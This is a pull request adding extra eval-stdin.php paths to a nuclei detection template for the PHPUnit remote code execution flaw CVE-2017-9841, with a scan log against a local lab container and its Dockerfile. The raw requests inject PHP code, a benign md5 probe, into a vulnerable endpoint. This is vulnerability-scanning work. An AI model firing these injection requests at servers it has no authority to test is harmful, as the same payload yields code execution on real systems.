### PR TITLE
Updated CVE-2017-9841 with new eval-stdin.php paths

### DIFF
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -18,8 +18,8 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2017-9841
     cwe-id: CWE-94
-    epss-score: 0.93905
-    epss-percentile: 0.99917
+    epss-score: 0.94351
+    epss-percentile: 0.99952
     cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*
   metadata:
     max-request: 6
@@ -32,6 +32,72 @@ variables:
 
 http:
   - raw:
+      - |
+        GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
+      - |
+        GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/html
+
+        <?php echo md5("{{string}}");?>
       - |
         GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
@@ -79,4 +145,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e1e5d0e48c5d29939cd8f3a05c4b13cb37c0574169baa0ccc077868b371bbb5002203a5a777d600b5dfbfb2f58d615e59371597020460962031cd7b62386b96d5b8c:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022074f281fc7e29573c054f910e322278e4e71419c27bf473555d8ca9313162d440022078c67a443a6f6b72b403374dce795fcf241d665e41e4605f867dc7d1ff37b556:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
Updated CVE-2017-9841 with new paths observed on the web.

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [X] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
```
$ nuclei -t CVE-2017-9841.yaml -u http://172.17.0.3/ -vv

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2017-9841] PHPUnit - Remote Code Execution (@random_robbie,@pikpikcu) [critical]
[CVE-2017-9841] [http] [critical] http://172.17.0.3/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/vendor/phpunit/src/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/vendor/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/phpunit/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/phpunit/src/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/lib/phpunit/src/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/lib/phpunit/Util/PHP/eval-stdin.php
[CVE-2017-9841] [http] [critical] http://172.17.0.3/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```

The env to reproduce the vulnerability was created using the following dockerfile:
```
FROM php:7.3.29-apache-bullseye

ADD flagA /etc/

RUN apt-get update; \
    apt-get install -y --no-install-recommends unzip zip git; \
    php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');";\
    php composer-setup.php;\
    mv composer.phar /usr/local/bin/composer; \
    chmod +x /usr/local/bin/composer; \
    cd /var/www/html; \
    composer require phpunit/phpunit:5.6.2; \
    apt-get purge --auto-remove -y unzip; \
    rm -rf /var/lib/apt/lists/*

EXPOSE 80
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
